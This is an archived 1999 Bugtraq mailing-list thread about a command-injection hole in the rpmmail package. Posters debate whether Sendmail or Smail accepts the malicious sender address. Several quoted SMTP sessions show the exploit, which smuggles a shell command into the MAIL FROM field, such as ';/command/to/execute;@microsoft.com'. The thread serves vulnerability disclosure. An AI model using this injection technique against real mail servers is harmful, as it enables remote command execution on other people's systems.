Alright, this is getting a little silly. THIS IS NOT A HOLE IN SENDMAIL OR ANY OTHER MTA! AHH! PLEASE read the entire post before emailing me or this list about how it does or does not work! To review: This is a hole in the RPMMAIL PACKAGE! RPMMAIL sets up an account called rpmmail and a .forward file that executes /home/rpmmail/rpmmail by piping the message recieved from whatever MTA you use into it. Thus all we need is for the MTA to pipe a message to rpmmail that contains metacharacters in the From: field. That's it. The only discussion of MTA's is about whether Sendmail or Smail will allow from fields which do not contain the "@whatever.com" piece. Smail does not require this, Sendmail does. Period. -Brock > ok This is what I have done and it does not work on RedHat 6.0 > > Script started on Tue Oct 12 10:17:23 1999 > [root@blair /tmp]# uname -a > Linux blair.idefense.com 2.2.5-15 #1 Mon Apr 19 23:00:46 EDT 1999 i686 > unknown > [root@blair /tmp]# ls -l /tmp/test > - -rwxr-xr-x 1 fiji fiji 57 Oct 11 14:53 /tmp/test > [root@blair /tmp]# cat /tmp/test > #!/bin/sh > echo "you have been hacked" > /tmp/test.output > [root@blair /tmp]# telnet localhost 25 > Trying 127.0.0.1... Connected to localhost. Escape character is '^]'. > 220 blair.ipartnership.com ESMTP Sendmail 8.9.3/8.9.3; Tue, 12 Oct > 1999 10:17:50 -0400 > mail from: ;/tmp/test;@microsoft.com > 250 ;/tmp/test;@microsoft.com... Sender ok > rcpt to: root > 250 root... Recipient ok > data > 354 Enter mail, end with "." on a line by itself > testing > . > 250 KAA15029 Message accepted for delivery > quit > 221 blair.ipartnership.com closing connection > Connection closed by foreign host. [root@blair /tmp]# ls -l /tmp > total 817 > drwx------ 2 root root 1024 Sep 21 10:53 orbit-root > - -rw-rw-r-- 1 root root 0 Oct 12 10:17 output > - -rwxr-xr-x 1 root root 10240 Oct 7 14:15 > sniffit.0.3.5.p1.tar > - -rwxr-xr-x 1 root root 819200 Oct 7 14:16 > sniffit.0.3.5.tar > - -rwxr-xr-x 1 fiji fiji 57 Oct 11 14:53 test > [root@blair /tmp]# > Script done on Tue Oct 12 10:18:27 1999 > > > as we can see there is no /tmp/test.output. > > > - -Fiji > > > - -----Original Message----- > From: Brock Tellier [mailto:btellierat_private] > Sent: Monday, October 11, 1999 12:02 PM > To: BUGTRAQat_private > Subject: Re: RH6.0 local/remote command execution > > > There seems to be some confusion regarding this post. Let me try to > explain. > > This post is titled "RH6.0 local/remote command execution" only > because > rpmmail is distributed on the RH6.0 Extra Applications CD. You can, of > course, install rpmmail on any other linux variant, such as SuSE, > which > is what I did. I believe I made this clear when I pasted: > > >bash-2.03$ cat /etc/SuSE-release;uname -a;id > >SuSE Linux 6.2 (i386) > >VERSION = 6.2 > >Linux fear62 2.2.10 #1 Tue Jul 20 16:32:24 MEST 1999 i686 unknown > >uid=100(xnec) gid=100(users) groups=100(users) > > In any case, as "D" pointed out, > > >MAIL FROM: ;/command/to/execute; > >553 ;/command/to/execute;... Domain name required > >MAIL FROM: ;/command/to/execute;@microsoft.com > >250 ;/command/to/execute;@microsoft.com... Sender ok > > should work on sendmail 8.9.3. > > - -Brock > > > > > That does not look like the MTA that comes with RH 6.0. That is > smail > not > > sendmail. I tryed this on my RH 6.0 install and it didn't work. > > Notice the "220 fear62 Smail-3.2" > > It's not sendmail. > > > > > > -----Original Message----- > > From: Bugtraq List [mailto:BUGTRAQat_private]On Behalf Of > Neezam > > Haniff > > Sent: Wednesday, October 06, 1999 12:50 PM > > To: BUGTRAQat_private > > Subject: RH6.0 local/remote command execution > > > > > > Hi, > > > > Here are some comments below... > > > > > The remote exploit is merely: > > > bash-2.03$ telnet localhost 25 > > > Trying 127.0.0.1... > > > Connected to localhost. > > > Escape character is '^]'. > > > 220 fear62 Smail-3.2 (#1 1999-Jul-23) ready at Tue, 5 Oct 1999 > > 11:31:13 -0500 > > > (CDT) > > > MAIL FROM: ;/command/to/execute; > > > 250 <;/command/to/execute;> ... Sender Okay > > > RCPT TO: rpmmail > > > 250 <rpmmail> ... Recipient Okay > > > data > > > 354 Enter mail, end with "." on a line by itself > > > . > > > 250 Mail accepted > > > quit > > > > > > > I find this odd that this exploit could exist on a Red Hat 6.0 > installation. > > sendmail 8.9.3 is the mailer that is installed and the way it's been > > configured, there's no way it would accept that sender address since > it's > > not qualifiable. Please confirm this. This is what I get when I test > this > > scenario on a Red Hat 6.0 system: > > > > [nhaniff@dhcp-160-190 nhaniff]$ telnet localhost 25 > > Trying 127.0.0.1... > > Connected to localhost. > > Escape character is '^]'. > > 220 dhcp-160-190.x.x ESMTP Sendmail 8.9.3/8.9.3; Wed, 6 Oct 1999 > > 13:31:55 -0400 > > helo x.x > > 250 dhcp-160-190.x.x Hello IDENT:nhaniff@localhost > [127.0.0.1], pleased > to > > meet you > > MAIL FROM: ;/command/to/execute; > > 553 ;/command/to/execute;... Domain name required > > > > The only way someone could take advantage of this exploit is if > their > mailer > > configuration allows for the sender to non-qualifiable. > > > > Neezam. > > > > -----BEGIN PGP SIGNATURE----- > Version: PGP 6.0.2 > Comment: Encrypted Document from Infrastructure Defense, Inc. > > iQA/AwUBOANEhIKtj2fJZe4vEQK+FwCbBKM5fYtsEAI3TCYnFEmxZXs0tQEAoLQw > Ho6rCei3wCD8Xfb3Q5+I7XSd > =8GsP > -----END PGP SIGNATURE----- >
This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 15:07:20 PDT